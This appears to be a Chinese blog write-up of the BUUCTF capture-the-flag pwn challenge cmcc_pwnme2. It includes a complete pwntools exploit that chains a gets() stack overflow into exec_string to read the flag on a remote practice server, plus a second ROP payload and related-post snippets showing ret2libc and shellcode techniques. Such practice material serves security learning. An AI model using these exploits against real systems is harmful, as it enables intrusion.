[BUUCTF]PWN——cmcc_pwnme2

最新推荐文章于 2024-01-31 14:40:58 发布
最新推荐文章于 2024-01-31 14:40:58 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/112850519
版权

cmcc_pwnme2

附件

步骤:

  1. 例行检查,32位,开启了nx保护
    在这里插入图片描述
  2. 本地运行一下看看大概的情况
    在这里插入图片描述
  3. 32位ida载入
    main(),10行的gets存在溢出
    在这里插入图片描述
    userfunction()
    在这里插入图片描述
    main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数
    exec_string()
    在这里插入图片描述
    add_home()
    在这里插入图片描述
    add_flag()
    在这里插入图片描述
  4. 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu上做题的经验来说,buu的flag一般都在根目录底下,所以这题就直接利用gets的溢出,将栈的返回地址覆盖成gets,在执行完gets后的ret写上exec_string()的地址,然后传入gets参数的地址&string,之后我们手动输入‘flag’字符串,这样就读出了flag
payload='a'*(0x6c+4)+p32(gets)+p32(exec_string)+p32(string)

完整exp:

from pwn import *

p = remote('node3.buuoj.cn',25200)
elf=ELF('./pwnme2')

exec_string=0x080485cb
string=0x0804a060
gets=elf.sym['gets']

p.recvuntil('Please input:\n')

payload='a'*(0x6c+4)+p32(gets)+p32(exec_string)+p32(string)

p.sendline(payload)
p.sendline('flag')
p.interactive()

在这里插入图片描述

比赛的话应该是利用add_home()和add_flag()去拼接一下flag的目录然后读取出来,应该是这样构造payload

payload=‘a’*(0x6c+4)+p32(add_home)+p32(pop_ebx)+p32(0xDEADBEEF)+p32(add_flag)+p32(pop_2个寄存器)+p32(0xCAFEBABE)+p32(0xABADF00D)+p32(exec_string)
Angel~Yan
关注
专栏目录
cmcc pwnme2
pondzhang的专栏
12-25 346
from pwn import * #p = process('./pwnme2') p = remote("node3.buuoj.cn",26522) libc = ELF('./libc-2.23.so') plt_puts = 0x08048490 got_puts = 0x0804A028 main = 0x080486F8 payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 294
BUUCTF 做题练习
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
cmcc_pwnme2
z1r0的博客
12-29 707
cmcc_pwnme2 查看保护 直接用的ret2libc。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27722) else: r = process(file_name) elf = ELF(file_name) def dbg():
BUUCTF之“cmcc_pwnme2”做题简单记录
Probeginner的博客
12-11 2657
这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就 是提示的信息。 from pwn import * p = remote('node4.buuoj.cn',25488) elf=ELF('./pwnme2') exec_string=0x080485cb string=0x0804a060 gets=elf.sym['gets'] p.recvuntil('Please input:\n') payload=b'a'*(0x6c+4)+p32(gets)+p32(.
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 365
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3181
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2540
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
pwnme3题目
10-14
cmcc的ctf的pwnme3的题目,欢迎大家一起学习交流做题的思路
[BUUCTF]-PWN:cmcc_pwnme2解析
最新发布
2301_79326813的博客
01-31 276
保护ida。
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 510
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 532
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 639
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 733
buuctf wp
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 1997
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1669
文章目录actf_2019_babystack actf_2019_babystack 栈迁移,注意ret对齐 没对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值